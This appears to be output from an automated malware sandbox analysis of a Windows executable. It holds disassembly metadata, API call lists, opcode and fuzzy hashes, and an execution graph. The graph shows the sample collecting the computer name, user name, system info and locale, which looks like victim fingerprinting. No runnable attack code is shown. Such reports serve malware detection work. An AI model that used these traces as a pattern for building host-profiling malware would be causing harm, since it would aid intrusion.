                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: c23c4b1906f3b9105c08545ecbb005ee467ee9de5e42c74c7a97987b86610234
                                                • Instruction ID: 254fe50e144d83ae228580dc777c738f0cb18bdd9b5d83fa556f821bd055903d
                                                • Opcode Fuzzy Hash: c23c4b1906f3b9105c08545ecbb005ee467ee9de5e42c74c7a97987b86610234
                                                • Instruction Fuzzy Hash: 8001A271904619EFDB23CB50DC09FBEBBB8FB04B20F040529F951A62D4DB7A9800CB90
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00FE4442
                                                • int.LIBCPMT ref: 00FE4455
                                                  • Part of subcall function 00FE16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00FE16C5
                                                  • Part of subcall function 00FE16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00FE16DF
                                                • std::_Facet_Register.LIBCPMT ref: 00FE4488
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00FE449E
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00FE44A9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                • String ID:
                                                • API String ID: 2081738530-0
                                                • Opcode ID: 947cf838b379a7827d93b4406722f59613bc2d996b5b91599314d665bd719402
                                                • Instruction ID: 3a82a62cb5058d72df5851d8b77723da0f2fc326c2837c022da3e3b7292421f5
                                                • Opcode Fuzzy Hash: 947cf838b379a7827d93b4406722f59613bc2d996b5b91599314d665bd719402
                                                • Instruction Fuzzy Hash: E201A772A00294ABCB25EB56DC059AE7768EF80770B24015DFD05972D0DF38BE41E794
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00FE3DBD
                                                • int.LIBCPMT ref: 00FE3DD0
                                                  • Part of subcall function 00FE16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00FE16C5
                                                  • Part of subcall function 00FE16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00FE16DF
                                                • std::_Facet_Register.LIBCPMT ref: 00FE3E03
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00FE3E19
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00FE3E24
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                • String ID:
                                                • API String ID: 2081738530-0
                                                • Opcode ID: 641a6209a70bec8a95cd148231261522266a87e19a73ea34dcb9b6b308b47a4a
                                                • Instruction ID: fce565eac466b7dc3b09837be5c7d19dfbb60452cd43ea27b2cff13ff054c2e1
                                                • Opcode Fuzzy Hash: 641a6209a70bec8a95cd148231261522266a87e19a73ea34dcb9b6b308b47a4a
                                                • Instruction Fuzzy Hash: 5F01A272900298ABCB35AF66DC498AE7769EF80764B240149F80197291DF39BE01EB80
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00FE4315
                                                • int.LIBCPMT ref: 00FE4328
                                                  • Part of subcall function 00FE16B4: std::_Lockit::_Lockit.LIBCPMT ref: 00FE16C5
                                                  • Part of subcall function 00FE16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 00FE16DF
                                                • std::_Facet_Register.LIBCPMT ref: 00FE435B
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00FE4371
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00FE437C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                • String ID:
                                                • API String ID: 2081738530-0
                                                • Opcode ID: 11d97bcf336e9f985b748f3a58362bd24e3583a8fe4a5545bf8c8385e9324d53
                                                • Instruction ID: 2c49d4c7a5dddea8f4f108b602d3e1c63e6b7bc34e84bd196181e4a0365ca9cb
                                                • Opcode Fuzzy Hash: 11d97bcf336e9f985b748f3a58362bd24e3583a8fe4a5545bf8c8385e9324d53
                                                • Instruction Fuzzy Hash: 4701D632900598ABCB25FF66DC058DE7769AF84760B14019DF805A7291EF38BE05FBC4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
                                                • String ID:
                                                • API String ID: 156189095-0
                                                • Opcode ID: 29dd648adc0cec95381419d6848f23308ad73b2fac0c9081a52793a924018bc2
                                                • Instruction ID: e5d88424d4976bf9ecc7c8202263037ddf359758beff068ac90f956c82a01c98
                                                • Opcode Fuzzy Hash: 29dd648adc0cec95381419d6848f23308ad73b2fac0c9081a52793a924018bc2
                                                • Instruction Fuzzy Hash: 6801BC31A006A18BD716AB21DC45A7D7762BF88750B54400DE9811B381CF3DBE02EBC5
                                                APIs
                                                • __getptd.LIBCMT ref: 01029626
                                                  • Part of subcall function 01028E77: __getptd_noexit.LIBCMT ref: 01028E7A
                                                  • Part of subcall function 01028E77: __amsg_exit.LIBCMT ref: 01028E87
                                                • __getptd.LIBCMT ref: 0102963D
                                                • __amsg_exit.LIBCMT ref: 0102964B
                                                • __lock.LIBCMT ref: 0102965B
                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 0102966F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                • String ID:
                                                • API String ID: 938513278-0
                                                • Opcode ID: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                • Instruction ID: 4384dadb4ee0a08b65528ecf3ce69fcb3bd7b10e01312d15c0d4c9a27d452338
                                                • Opcode Fuzzy Hash: 9141d4d236c8230aa4afe5b4a9d8ccb2514574f5d49c72fbeb20a3e596f06de6
                                                • Instruction Fuzzy Hash: 09F0B432A047329BDB71BB689806B9D37D0AF24728F95414AD4D4A62D1CF245940CB5A
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00FEB353,00000000,?,0105B6DC,?,?,?,00FEB4F6,00000004,InitializeCriticalSectionEx,01004BD8,InitializeCriticalSectionEx), ref: 00FEB3AF
                                                • GetLastError.KERNEL32(?,00FEB353,00000000,?,0105B6DC,?,?,?,00FEB4F6,00000004,InitializeCriticalSectionEx,01004BD8,InitializeCriticalSectionEx,00000000,?,00FEB2AD), ref: 00FEB3B9
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00FEB3E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$ErrorLast
                                                • String ID: api-ms-
                                                • API String ID: 3177248105-2084034818
                                                • Opcode ID: cfa97ffa755bb10de85fdddf7e5999f8fbe2ffa62a76b599b312737f70b2491b
                                                • Instruction ID: 5aa57375bbe4f435d8b52f341b4f9b819ae583e1c0328a0e37676e00b403595d
                                                • Opcode Fuzzy Hash: cfa97ffa755bb10de85fdddf7e5999f8fbe2ffa62a76b599b312737f70b2491b
                                                • Instruction Fuzzy Hash: 8CE09230645344BFEA225B72EC46B593E55AB00B51F104022FA4DE80D5D76699519694
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(558E5182,00000000,00000000,00000000), ref: 00FF77AA
                                                  • Part of subcall function 00FF952A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00FF8FD3,?,00000000,-00000008), ref: 00FF95D6
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00FF7A05
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00FF7A4D
                                                • GetLastError.KERNEL32 ref: 00FF7AF0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                • String ID:
                                                • API String ID: 2112829910-0
                                                • Opcode ID: 543a638f01c141b58dfee58f9d0c3af54597fd6384a66c84ebc9016c20a6b680
                                                • Instruction ID: 71e346f5fbb1daf84bf38dc2ff510da38017bf3fccfa009fc9a84bde20f0a061
                                                • Opcode Fuzzy Hash: 543a638f01c141b58dfee58f9d0c3af54597fd6384a66c84ebc9016c20a6b680
                                                • Instruction Fuzzy Hash: 69D18875D042889FCB11DFA8C880AEDFBB5FF08310F28416AE965EB361D774A902DB50
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: e28b70c9eb6b5a005069a224490a0dd1eaa8c6782052a8690765c9d482b92f9d
                                                • Instruction ID: d14ebe8da276cd62189cd90aee429d64ee71e0ce9437e364736d114285e067c8
                                                • Opcode Fuzzy Hash: e28b70c9eb6b5a005069a224490a0dd1eaa8c6782052a8690765c9d482b92f9d
                                                • Instruction Fuzzy Hash: B051F172A003869FEB25DF56D845B7AB7A4EF40320F24442DE815872E1E775BD40EB92
                                                APIs
                                                • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,00000000,?,00FFF713,00000000,00000001,00000000,00000000,?,00FF7B44,00000000,00000000,00000000), ref: 01000706
                                                • GetLastError.KERNEL32(?,00FFF713,00000000,00000001,00000000,00000000,?,00FF7B44,00000000,00000000,00000000,00000000,00000000,?,00FF80CB,00000000), ref: 01000712
                                                  • Part of subcall function 010006D8: CloseHandle.KERNEL32(FFFFFFFE,01000722,?,00FFF713,00000000,00000001,00000000,00000000,?,00FF7B44,00000000,00000000,00000000,00000000,00000000), ref: 010006E8
                                                • ___initconout.LIBCMT ref: 01000722
                                                  • Part of subcall function 0100069A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,010006C9,00FFF700,00000000,?,00FF7B44,00000000,00000000,00000000,00000000), ref: 010006AD
                                                • WriteConsoleW.KERNEL32(00000000,0000000C,?,00000000,?,00FFF713,00000000,00000001,00000000,00000000,?,00FF7B44,00000000,00000000,00000000,00000000), ref: 01000737
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: c8a11a01020ace48e40a3042166bc5c19451df964fd6674217e3503fdcb126f6
                                                • Instruction ID: 1cc925762de017449d4bf919a9a8416c02d5729a2aa80c6d4cb3e311e7e4c571
                                                • Opcode Fuzzy Hash: c8a11a01020ace48e40a3042166bc5c19451df964fd6674217e3503fdcb126f6
                                                • Instruction Fuzzy Hash: 35F01C36900155BFDF631FD5DC08ACA3FA6FB4D2E1F004051FA9D95164CA368920EF90
                                                APIs
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00FEA09F
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00FEA153
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 3480331319-1018135373
                                                • Opcode ID: 949af0c77d46f93cd80840bc9717aa4b98730b7e208d72fd1db7c33a19c8ea79
                                                • Instruction ID: 65c02b1ad0ae358af657b9e2d4507e46a08c06445d650b1ead155e29a37741bd
                                                • Opcode Fuzzy Hash: 949af0c77d46f93cd80840bc9717aa4b98730b7e208d72fd1db7c33a19c8ea79
                                                • Instruction Fuzzy Hash: F141D634E002899BCF11DF6ACC80A9E7BB5AF45324F148055FA149B392D739EE15DF92
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?), ref: 00FEA992
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: 0f5bfb600b3e68bb5fb625feeef7edad40941e10ddd0fed851b1cff39176d132
                                                • Instruction ID: 38dc95353854d24c64c485a1dbefdd0d196a9dfec822e4ea238b1f3b3ba811bf
                                                • Opcode Fuzzy Hash: 0f5bfb600b3e68bb5fb625feeef7edad40941e10ddd0fed851b1cff39176d132
                                                • Instruction Fuzzy Hash: C9418C31D00249EFCF16DF95CD81AAEBBB5FF08310F1540A9FA04A7221D339A950EB52
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: @
                                                • API String ID: 3732870572-2766056989
                                                • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                • Instruction ID: 69bf0af6ebadd628308bd1855b947aa945b80dd8b9b68c8d5894b23a1d56e8b6
                                                • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                                • Instruction Fuzzy Hash: E1215CB1E44218ABDB00DFD4CC49FEEB7B9FB45B10F104209F605BB280C7B869018BA9
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __aulldiv
                                                • String ID: @
                                                • API String ID: 3732870572-2766056989
                                                • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                • Instruction ID: bb37f94e6c44bcba34117ffaa76180b364d873d23e71f5308ab813c74bebe7f6
                                                • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                                                • Instruction Fuzzy Hash: 97016DB0D44308FAEB10DBE0CC49BDDBBB8EB40B01F248448E744762C0D7B495428B59
                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00FE15E6
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FE161E
                                                  • Part of subcall function 00FE5178: _Yarn.LIBCPMT ref: 00FE5197
                                                  • Part of subcall function 00FE5178: _Yarn.LIBCPMT ref: 00FE51BB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                • String ID: bad locale name
                                                • API String ID: 1908188788-1405518554
                                                • Opcode ID: fcf4e863e8419c131705cf42f3112011c3404ef195e6cd81afd40de1bcfa3d17
                                                • Instruction ID: 72d72a634633aeadf8b4a1e3ebe2cd295dfa0cf0662554861d41e78c6e62f603
                                                • Opcode Fuzzy Hash: fcf4e863e8419c131705cf42f3112011c3404ef195e6cd81afd40de1bcfa3d17
                                                • Instruction Fuzzy Hash: 36F03A71546B909E83319F7B8881447FBE4BE293207948E2FE0DEC3A12D734E404CB6A

                                                Execution Graph

                                                Execution Coverage:13.4%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:0.6%
                                                Total number of Nodes:1529
                                                Total number of Limit Nodes:3
                                                execution_graph 12991 401190 12996 4178e0 12991->12996 12993 40119e 12995 4011b7 12993->12995 13000 417850 12993->13000 12997 417916 GetComputerNameA 12996->12997 12999 417939 12997->12999 12999->12993 13001 417886 GetUserNameA 13000->13001 13003 4178c3 13001->13003 13003->12995 14764 41dc60 14767 41a710 14764->14767 14766 41dc6d atexit 14767->14766 13004 4169f0 13022 402260 13004->13022 13008 416a00 13115 401160 GetSystemInfo 13008->13115 13014 416a21 13015 416a26 GetUserDefaultLCID 13014->13015 13016 417850 GetUserNameA 13015->13016 13017 416a30 13016->13017 13018 4178e0 GetComputerNameA 13017->13018 13020 416a43 13018->13020 13126 415b10 13020->13126 13021 416b16 13206 4045c0 17 API calls 13022->13206 13024 402274 13025 4045c0 34 API calls 13024->13025 13026 40228d 13025->13026 13027 4045c0 34 API calls 13026->13027 13028 4022a6 13027->13028 13029 4045c0 34 API calls 13028->13029 13030 4022bf 13029->13030 13031 4045c0 34 API calls 13030->13031 13032 4022d8 13031->13032 13033 4045c0 34 API calls 13032->13033 13034 4022f1 13033->13034 13035 4045c0 34 API calls 13034->13035 13036 40230a 13035->13036 13037 4045c0 34 API calls 13036->13037 13038 402323 13037->13038 13039 4045c0 34 API calls 13038->13039 13040 40233c 13039->13040 13041 4045c0 34 API calls 13040->13041 13042 402355 13041->13042 13043 4045c0 34 API calls 13042->13043 13044 40236e 13043->13044 13045 4045c0 34 API calls 13044->13045 13046 402387 13045->13046 13047 4045c0 34 API calls 13046->13047 13048 4023a0 13047->13048 13049 4045c0 34 API calls 13048->13049 13050 4023b9 13049->13050 13051 4045c0 34 API calls 13050->13051 13052 4023d2 13051->13052 13053 4045c0 34 API calls 13052->13053 13054 4023eb 13053->13054 13055 4045c0 34 API calls 13054->13055 13056 402404 13055->13056 13057 4045c0 34 API calls 13056->13057 13058 40241d 13057->13058 13059 4045c0 34 API calls 13058->13059 13060 402436 13059->13060 13061 4045c0 34 API calls 13060->13061 13062 40244f 13061->13062 13063 4045c0 34 API calls 13062->13063 13064 402468 13063->13064 13065 4045c0 34 API calls 13064->13065 13066 402481 13065->13066 13067 4045c0 34 API calls 13066->13067 13068 40249a 13067->13068 13069 4045c0 34 API calls 13068->13069 